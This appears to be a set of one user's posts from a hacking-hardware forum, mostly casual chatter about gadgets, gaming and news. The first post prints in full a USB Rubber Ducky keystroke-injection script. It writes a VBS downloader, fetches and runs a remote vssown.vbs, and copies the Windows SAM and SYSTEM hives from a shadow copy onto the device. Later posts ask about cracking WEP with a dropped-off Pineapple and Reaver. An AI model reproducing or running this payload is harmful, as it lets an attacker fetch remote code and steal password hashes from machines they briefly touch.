[SAM File Copy - Help]

Anyone? 

[SAM File Copy - Help]

Hey everyone. 
I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over.

Here is the script I am using.

 

REM Modifications by overwraith
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY 
REM TO DESIRED DIRECTORY WOULD HAVE GONE. 
REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. 
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
ENTER
DELAY 800
STRING cd %DUCKYdrive%
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing 
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.

 

 

 

I changed 

STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .

to 

STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .

Also the following:

 STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM

.

to 

STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .

 

Ducky is the name of the MicroSD Card so would that be correct?

 

I changed

STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs 

to a vbs script provided by LanMaster53 github account. 

https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. 

 

 

What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware. 

[The details]

Thanks. I guess I will stick to the Nano for now.

[The details]

I have a few questions before I shell out the cash for this.

Can we use modules that were available for like the Mark V on this or will we need to wait for all new modules to be developed?

So can I run like Reaver and everything right away?

[Pineapple Nano in the High School Classroom]

Hi I am new to the forums but I have taught at a few STEM schools and colleges as a guest teacher or speaker and this is what I think would be a good idea.

Course 1: Introduction to Linux
Course 2: Introduction to Cyber Security (What CS is all about & understanding of tools)
Course 3: Intermediate Cyber Security (Getting hands on with the tools)

Course 4: Advanced Cyber Security (Penetration Testing)
Course 5: Applied Cyber Security and Penetration Testing (CTF Events, Red Team Exercises, Programming Challenges, etc.)

[crack the WEP]

Hey guys,

I am thinking about getting a pineapple here in the next few days. I would be able to use this for pentesting correct? I need to be able to drop something off and let it crack the WEP.

[Penguicon 2010]

i go to all of them i live like 30 mins from nashville.

[Penguicon 2010]

irongeek is awesome i have known him for a few years he doesnt live that far from me and we hang out during phreaknic at times great site too.

[Apple releases Ipad]

yea but i have never owned a tablet. but now i got the money for it so i am going to get one.

[Apple releases Ipad]

iPad” for consumers who want to take their movies, TV shows, music, games and reading with them, be it around the house or on the go.

“We want to kick off 2010 with a truly revolutionary and magical product,” CEO Steve Jobs told a packed audience at the Yerba Buena Center for the Arts in San Francisco on Wednesday.

Apple’s new product comes at a time when e-readers, like Amazon’s Kindle and others from Barnes & Noble and Sony are on the market, with more coming this year from companies such as Samsung and the Hearst Corp.

This thing is going to rock

http://it-networks.org/?m=20100127

[Spam PM on this forum]

yea i just got this too. i was like wtf.

[XBOX Gamer Tags]

Anyone wanna get toghter and do some COD:MW2 Gaming one night. hit me up

fused36 always on

[Saints are goin' to the Super Bowl!]

yea i seen it the guys that live next door to me came out screaming while i was cooking it scared the shit out of me.

[Cherrypal Africa $99 Laptop]

o we have computers at work that are 129$ that have windows ce on it. i hate them so much we didnt realize before xmas that the battery blew up after a few hrs of charging bc we take all of our batteries out and we had about the the 100 that we sold 98 of them come back

[Battlefield 2]

I was wondering if anyone here plays battlefield 2 online and if they game one night.